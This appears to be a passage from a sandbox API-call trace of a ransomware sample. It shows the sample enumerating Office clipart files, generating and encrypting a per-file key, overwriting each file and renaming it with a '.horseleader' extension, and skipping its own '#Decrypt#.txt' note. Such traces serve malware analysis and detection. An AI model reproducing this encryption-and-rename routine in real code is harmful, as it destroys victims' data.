ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00200_.WMF", cAlternateFileName="")) returned 1 [0253.688] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="Windows") returned -1 [0253.688] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 67 [0253.688] StrStrIW (lpFirst="BS00200_.WMF", lpSrch=".horseleader") returned 0x0 [0253.688] lstrcmpW (lpString1="BS00200_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.688] lstrcmpW (lpString1="BS00200_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.688] lstrlenW (lpString=".testttjffg") returned 11 [0253.688] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.688] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.688] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.688] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.689] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 67 [0253.689] StrStrW (lpFirst="BS00200_.WMF", lpSrch=".txt") returned 0x0 [0253.689] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3104) returned 1 [0253.689] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc20, lpOverlapped=0x0) returned 1 [0253.690] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.691] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc20, lpOverlapped=0x0) returned 1 [0253.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.691] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.691] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.691] CloseHandle (hObject=0x158) returned 1 [0253.691] GetProcessHeap () returned 0x780000 [0253.691] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.691] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.horseleader") returned 79 [0253.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.horseleader")) returned 1 [0253.692] GetProcessHeap () returned 
0x780000 [0253.692] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.692] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54fadc00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54fadc00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00224_.WMF", cAlternateFileName="")) returned 1 [0253.692] lstrcmpiW (lpString1="BS00224_.WMF", lpString2="Windows") returned -1 [0253.692] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 67 [0253.692] StrStrIW (lpFirst="BS00224_.WMF", lpSrch=".horseleader") returned 0x0 [0253.692] lstrcmpW (lpString1="BS00224_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.692] lstrcmpW (lpString1="BS00224_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.692] lstrlenW (lpString=".testttjffg") returned 11 [0253.692] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.692] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.693] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.693] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 67 [0253.693] StrStrW (lpFirst="BS00224_.WMF", lpSrch=".txt") returned 0x0 [0253.693] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1588) returned 1 [0253.693] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x634, lpOverlapped=0x0) returned 1 [0253.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.695] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x634, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x634, lpOverlapped=0x0) returned 1 [0253.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.695] CloseHandle (hObject=0x158) returned 1 [0253.695] GetProcessHeap () returned 0x780000 [0253.695] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.695] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.horseleader") returned 79 
[0253.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.horseleader")) returned 1 [0253.696] GetProcessHeap () returned 0x780000 [0253.696] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.696] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c55700, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x62c55700, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0x4bc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00438_.WMF", cAlternateFileName="")) returned 1 [0253.696] lstrcmpiW (lpString1="BS00438_.WMF", lpString2="Windows") returned -1 [0253.696] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 67 [0253.696] StrStrIW (lpFirst="BS00438_.WMF", lpSrch=".horseleader") returned 0x0 [0253.696] lstrcmpW (lpString1="BS00438_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.696] lstrcmpW (lpString1="BS00438_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.696] lstrlenW (lpString=".testttjffg") returned 11 [0253.696] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.696] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.696] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.696] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.697] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 67 [0253.697] StrStrW (lpFirst="BS00438_.WMF", lpSrch=".txt") returned 0x0 [0253.697] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1212) returned 1 [0253.697] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4bc, lpOverlapped=0x0) returned 1 [0253.699] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.699] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4bc, lpOverlapped=0x0) returned 1 [0253.700] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.700] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.700] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.700] CloseHandle (hObject=0x158) returned 1 [0253.700] GetProcessHeap () returned 0x780000 [0253.700] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.700] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.horseleader") returned 79 [0253.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.horseleader")) returned 1 [0253.704] GetProcessHeap () returned 0x780000 [0253.704] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.704] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x276b5e00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x276b5e00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00439_.WMF", cAlternateFileName="")) returned 1 [0253.704] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="Windows") returned -1 [0253.704] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 67 [0253.704] StrStrIW (lpFirst="BS00439_.WMF", lpSrch=".horseleader") returned 0x0 [0253.704] lstrcmpW (lpString1="BS00439_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.704] lstrcmpW 
(lpString1="BS00439_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.704] lstrlenW (lpString=".testttjffg") returned 11 [0253.704] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.704] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.705] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.706] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 67 [0253.706] StrStrW (lpFirst="BS00439_.WMF", lpSrch=".txt") returned 0x0 [0253.706] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2052) returned 1 [0253.706] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0253.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.708] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x804, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0253.709] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0253.709] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.709] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.709] CloseHandle (hObject=0x158) returned 1 [0253.709] GetProcessHeap () returned 0x780000 [0253.709] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.709] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.horseleader") returned 79 [0253.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.horseleader")) returned 1 [0253.710] GetProcessHeap () returned 0x780000 [0253.710] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.710] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x263a3100, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x263a3100, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x15cc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00440_.WMF", cAlternateFileName="")) returned 1 [0253.710] lstrcmpiW 
(lpString1="BS00440_.WMF", lpString2="Windows") returned -1 [0253.710] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 67 [0253.710] StrStrIW (lpFirst="BS00440_.WMF", lpSrch=".horseleader") returned 0x0 [0253.710] lstrcmpW (lpString1="BS00440_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.710] lstrcmpW (lpString1="BS00440_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.710] lstrlenW (lpString=".testttjffg") returned 11 [0253.710] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.710] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.710] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.711] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 67 [0253.711] StrStrW (lpFirst="BS00440_.WMF", lpSrch=".txt") returned 0x0 [0253.711] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5580) returned 1 [0253.711] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x15cc, lpOverlapped=0x0) returned 1 [0253.712] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffea34, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.713] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x15cc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x15cc, lpOverlapped=0x0) returned 1 [0253.713] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.713] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.713] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.713] CloseHandle (hObject=0x158) returned 1 [0253.713] GetProcessHeap () returned 0x780000 [0253.713] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.713] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.horseleader") returned 79 [0253.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.horseleader")) returned 1 [0253.714] GetProcessHeap () returned 0x780000 [0253.714] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.714] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25090400, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x25090400, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00441_.WMF", cAlternateFileName="")) returned 1 [0253.714] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="Windows") returned -1 [0253.714] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 67 [0253.714] StrStrIW (lpFirst="BS00441_.WMF", lpSrch=".horseleader") returned 0x0 [0253.714] lstrcmpW (lpString1="BS00441_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.714] lstrcmpW (lpString1="BS00441_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.714] lstrlenW (lpString=".testttjffg") returned 11 [0253.714] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.714] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.714] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 67 [0253.715] StrStrW 
(lpFirst="BS00441_.WMF", lpSrch=".txt") returned 0x0 [0253.715] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3524) returned 1 [0253.715] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xdc4, lpOverlapped=0x0) returned 1 [0253.717] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff23c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.717] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xdc4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xdc4, lpOverlapped=0x0) 